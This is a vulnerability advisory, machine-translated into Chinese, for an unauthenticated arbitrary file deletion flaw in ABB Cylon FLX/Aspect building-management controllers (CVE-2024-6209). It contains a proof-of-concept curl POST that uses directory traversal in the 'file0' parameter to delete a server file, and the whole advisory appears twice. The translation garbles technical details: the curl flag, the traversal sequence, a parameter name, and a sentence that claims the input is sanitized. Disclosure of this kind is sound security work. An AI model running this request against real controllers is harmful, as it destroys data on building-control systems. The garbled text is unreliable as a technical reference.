ABB CYLON FOCKECT 3.08.01(数据库Filedelete.php)任意文件删除
Vendor: ABB Ltd.
产品网页: https://www.global.abb
受影响的版本: Nexus系列,Matrix-2系列,方面- 企业,方面- 企业
固件:=3.08.01
摘要:是屡获殊荣的可扩展建筑能源管理
和旨在允许用户无缝访问其的控制解决方案
通过包括智能设备在内的标准建筑协议来构建数据。
DESC: BMS/BAS控制器患有任意文件删除漏洞。
输入传递给“ databasefiletelete.php”中的“文件”参数
在被用来删除文件之前进行消毒。这可以由未经身份验证的
使用目录的攻击者使用Web服务器的权限删除文件
在受影响的邮政参数中通过的遍历序列。
在: GNU/Linux 3.15.10(ARMV7L)上测试
gnu/linux 3.10.0(x86_64)
GNU/Linux 2.6.32(x86_64)
英特尔(R)原子(TM)处理器E3930 @ 1.30GHz
英特尔(R)Xeon(r)银4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
extackft自动化应用程序服务器
LightTPD/1.4.32
LightTPD/1.4.18
Apache/2.2.15(CentOS)
OpenJDK运行时环境(RHEL-2.6.22.1.-x86_64)
OpenJDK 64位服务器VM(构建24.261-B02,混合模式)
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5827
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5827.php
CVE ID: CVE-2024-6209
cve url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
- -
$ CAT项目
项目
。|
| |
|'| ._____
___ | | |。 |' 。----'|
_ .-'' - 。 | | 。--'| | | | _ | |
.-'| 。| | || ' - _ | | | | | | | |
|' | | | | | | | | | | | | | | | | | | | | | |
__ | ' - '''' - '' - 。 ``| __
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████████▒░▒▓██████▒░░▒▓████████████▒░▒▓██████▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░░▒▓█▓▒░░░░░░░░▒▓██████▓▒░
$ curl -x Post http://192.168.73.31/databasefiledelete.php \
-d'file0=././././././././home/mix_cmix/htmlroot/validate/validateSheader.php \
delete0=1 \
总计=1 \
submitdeleteform=delete'
meta http-equiv='refresh'content='0; url=databasefile.php'
Vendor: ABB Ltd.
产品网页: https://www.global.abb
受影响的版本: Nexus系列,Matrix-2系列,方面- 企业,方面- 企业
固件:=3.08.01
摘要:是屡获殊荣的可扩展建筑能源管理
和旨在允许用户无缝访问其的控制解决方案
通过包括智能设备在内的标准建筑协议来构建数据。
DESC: BMS/BAS控制器患有任意文件删除漏洞。
输入传递给“ databasefiletelete.php”中的“文件”参数
在被用来删除文件之前进行消毒。这可以由未经身份验证的
使用目录的攻击者使用Web服务器的权限删除文件
在受影响的邮政参数中通过的遍历序列。
在: GNU/Linux 3.15.10(ARMV7L)上测试
gnu/linux 3.10.0(x86_64)
GNU/Linux 2.6.32(x86_64)
英特尔(R)原子(TM)处理器E3930 @ 1.30GHz
英特尔(R)Xeon(r)银4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
extackft自动化应用程序服务器
LightTPD/1.4.32
LightTPD/1.4.18
Apache/2.2.15(CentOS)
OpenJDK运行时环境(RHEL-2.6.22.1.-x86_64)
OpenJDK 64位服务器VM(构建24.261-B02,混合模式)
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5827
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5827.php
CVE ID: CVE-2024-6209
cve url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
- -
$ CAT项目
项目
。|
| |
|'| ._____
___ | | |。 |' 。----'|
_ .-'' - 。 | | 。--'| | | | _ | |
.-'| 。| | || ' - _ | | | | | | | |
|' | | | | | | | | | | | | | | | | | | | | | |
__ | ' - '''' - '' - 。 ``| __
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████████▒░▒▓██████▒░░▒▓████████████▒░▒▓██████▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░░▒▓█▓▒░░░░░░░░▒▓██████▓▒░
$ curl -x Post http://192.168.73.31/databasefiledelete.php \
-d'file0=././././././././home/mix_cmix/htmlroot/validate/validateSheader.php \
delete0=1 \
总计=1 \
submitdeleteform=delete'
meta http-equiv='refresh'content='0; url=databasefile.php'
